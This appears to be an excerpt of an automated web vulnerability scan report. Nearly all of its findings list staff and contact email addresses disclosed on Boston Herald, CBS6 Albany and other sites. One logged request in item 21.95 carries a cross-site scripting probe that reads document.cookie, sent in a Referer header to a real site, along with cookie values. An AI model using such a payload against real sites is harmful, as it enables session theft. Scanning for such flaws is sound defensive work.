The following email addresses were disclosed in the response:

492776_Congresswoman_Shot_Obama__trose@heraldinteractive.com
54c191_Seahawks_Bears_Football__trose@heraldinteractive.com

Request

Response

21.47. http://www.bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The following email addresses were disclosed in the response:

492776_Congresswoman_Shot_Obama__trose@heraldinteractive.com
54c191_Seahawks_Bears_Football__trose@heraldinteractive.com

Request

Response

21.48. http://www.bostonherald.com/news/opinion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/opinion/

Issue detail

The following email address was disclosed in the response:

letterstoeditor@bostonherald.com

Request

Response

21.49. http://www.bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The following email address was disclosed in the response:

hchabot@bostonherald.com

Request

Response

21.50. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The following email address was disclosed in the response:

hchabot@bostonherald.com

Request

Response

21.51. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

Issue detail

The following email address was disclosed in the response:

hchabot@bostonherald.com

Request

Response

21.52. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The following email address was disclosed in the response:

hchabot@bostonherald.com

Request

Response

21.53. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

Issue detail

The following email address was disclosed in the response:

hchabot@bostonherald.com

Request

Response

21.54. http://www.bostonherald.com/news/regional/gardner_heist/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/gardner_heist/

Issue detail

The following email addresses were disclosed in the response:

gardnertheft@bostonherald.com
theft@gardnermuseum.org

Request

Response

21.55. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

-cmcconville@bostonherald.com

Request

Response

21.56. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

dwedge@bostonherald.com

Request

Response

21.57. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

-cmcconville@bostonherald.com

Request

Response

21.58. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

-cmcconville@bostonherald.com

Request

Response

21.59. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

-lsweet@bostonherald.com
lsweet@bostonherald.com

Request

Response

21.60. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The following email address was disclosed in the response:

dwedge@bostonherald.com

Request

Response

21.61. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

Issue detail

The following email address was disclosed in the response:

dwedge@bostonherald.com

Request

Response

21.62. http://www.bostonherald.com/projects/boston_pensions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/boston_pensions/

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

Response

21.63. http://www.bostonherald.com/projects/bra/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/bra/

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

Response

21.64. http://www.bostonherald.com/projects/buybacks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/buybacks/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.65. http://www.bostonherald.com/projects/consultants/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/consultants/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.66. http://www.bostonherald.com/projects/edic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/edic/

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

Response

21.67. http://www.bostonherald.com/projects/lawyer_pay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/lawyer_pay/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.68. http://www.bostonherald.com/projects/mta2008/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/mta2008/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.69. http://www.bostonherald.com/projects/payroll/brockton/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/brockton/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.70. http://www.bostonherald.com/projects/payroll/cambridge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cambridge/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.71. http://www.bostonherald.com/projects/payroll/cca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cca/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.72. http://www.bostonherald.com/projects/payroll/mass_pike/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/mass_pike/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.73. http://www.bostonherald.com/projects/payroll/quasi_state/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quasi_state/

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

Response

21.74. http://www.bostonherald.com/projects/payroll/quincy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quincy/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.75. http://www.bostonherald.com/projects/payroll/springfield/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/springfield/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.76. http://www.bostonherald.com/projects/payroll/suffolk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/suffolk/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.77. http://www.bostonherald.com/projects/payroll/worcester/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/worcester/

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.78. http://www.bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

21.79. http://www.bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

Response

21.80. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

-sbulpett@bostonherald.com
sbulpett@bostonherald.com

Request

Response

21.81. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

-sbulpett@bostonherald.com
sbulpett@bostonherald.com

Request

Response

21.82. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

-rborges@bostonherald.com

Request

Response

21.83. http://www.bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The following email address was disclosed in the response:

kguregian@bostonherald.com

Request

Response

21.84. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The following email address was disclosed in the response:

kguregian@bostonherald.com

Request

Response

21.85. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

Issue detail

The following email address was disclosed in the response:

kguregian@bostonherald.com

Request

Response

21.86. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The following email address was disclosed in the response:

backcopy@bostonherald.com

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>BostonHerald.com</title>
<
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...

21.87. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

21.88. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

21.89. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

21.90. http://www.cbs6albany.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

jgretzinger@wrgb.com
news@cbs6albany.com

Request

Response

21.91. http://www.cbs6albany.com/albany-community/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-community/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.92. http://www.cbs6albany.com/albany-tv-programming/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-tv-programming/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.93. http://www.cbs6albany.com/albany-weather-forecast previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-weather-forecast

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.94. http://www.cbs6albany.com/common/archives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.95. http://www.cbs6albany.com/common/tools/load.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The following email address was disclosed in the response:

bruno@missingmethod.com

Request

GET /common/tools/load.php?js=common_prototype1_5_1,common_prototype1_5_1_effects,common_glider HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1298828234584%26vn%3D1; s_lastvisit=1296236234801; s_vnum_w=1296367200803%26vn%3D1; s_vnum_m=1296540000804%26vn%3D1; __qca=P0-387650238-1296236241942; s_nr=1296236252424; ebPanelFrequency_.www.cbs6albany.com=4189023%3A2%3A1%3A1296322656115; ebNewBandWidth_.www.cbs6albany.com=2030%3A1296236256165

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:38:14 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 15:40:53 GMT
ETag: "21d41b32472578a8cb78d13b2b0a036a-135983"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 13:38:14 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 135983

/* http://www.cbs6albany.com/common/tools/load.php?js=common_prototype1_5_1,common_prototype1_5_1_effects,common_glider */
/* Prototype JavaScript framework, version 1.5.1
* (c) 2005-2007 Sam Steph
...[SNIP]...
<bruno@missingmethod.com>
...[SNIP]...

21.96. http://www.cbs6albany.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/search/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 47273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.97. http://www.cbs6albany.com/sections/abouthdtv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/abouthdtv/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.98. http://www.cbs6albany.com/sections/articles-map/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/articles-map/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 22945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:og="
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.99. http://www.cbs6albany.com/sections/contactus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/contactus/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.100. http://www.cbs6albany.com/sections/contactus/newstips/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/contactus/newstips/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.101. http://www.cbs6albany.com/sections/employmentopportunities/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/employmentopportunities/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.102. http://www.cbs6albany.com/sections/jobsonline/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/jobsonline/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.103. http://www.cbs6albany.com/sections/live-cameras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/live-cameras/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.104. http://www.cbs6albany.com/sections/local-news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/local-news/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.105. http://www.cbs6albany.com/sections/local-sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/local-sports/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.106. http://www.cbs6albany.com/sections/production-department/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/production-department/

Issue detail

The following email addresses were disclosed in the response:

bbrandt@wrgb.com
news@cbs6albany.com

Request

Response

21.107. http://www.cbs6albany.com/sections/publicfile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/publicfile/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.108. http://www.cbs6albany.com/sections/rss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/rss/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.109. http://www.cbs6albany.com/sections/sales/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sales/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.110. http://www.cbs6albany.com/sections/satellitewaivers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/satellitewaivers/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.111. http://www.cbs6albany.com/sections/schoolclosures/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/schoolclosures/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.112. http://www.cbs6albany.com/sections/schoolwatch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/schoolwatch/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.113. http://www.cbs6albany.com/sections/sitemap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sitemap/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:40 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:40 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Ask A Question stories">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Submit Photos stories">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Send Us a Tip stories">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Ask A Question stories">
...[SNIP]...

21.114. http://www.cbs6albany.com/sections/sp-alerts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sp-alerts/

Issue detail

The following email addresses were disclosed in the response:

news@cbs6albany.com
support@freedom.com

Request

Response

21.115. http://www.cbs6albany.com/sections/traffic-events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/traffic-events/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.116. http://www.cbs6albany.com/sections/traffic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/traffic/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.117. http://www.cbs6albany.com/sections/tvlistings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/tvlistings/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.118. http://www.cbs6albany.com/sections/videocopies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/videocopies/

Issue detail

The following email addresses were disclosed in the response:

adirondackvideo@yahoo.com
news@cbs6albany.com

Request

Response

21.119. http://www.cbs6albany.com/sections/weather/7day/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/weather/7day/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.120. http://www.cbs6albany.com/sections/web-links/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/web-links/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.121. http://www.cbs6albany.com/sections/wrgb-talent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/wrgb-talent/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.122. http://www.cbs6albany.com/sections/you-paid-for-it/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/you-paid-for-it/

Issue detail

The following email address was disclosed in the response:

news@cbs6albany.com

Request

Response

21.123. http://www.dominionenterprises.com/main/do/Privacy_Policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dominionenterprises.com
Path:	/main/do/Privacy_Policy

Issue detail

The following email address was disclosed in the response:

IPadministrator@dominionenterprises.com

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.124. http://www.dominionenterprises.com/main/do/Terms_of_Use previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dominionenterprises.com
Path:	/main/do/Terms_of_Use

Issue detail

The following email address was disclosed in the response:

IPadministrator@dominionenterprises.com

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.125. http://www.moxiesoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><Title>M
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

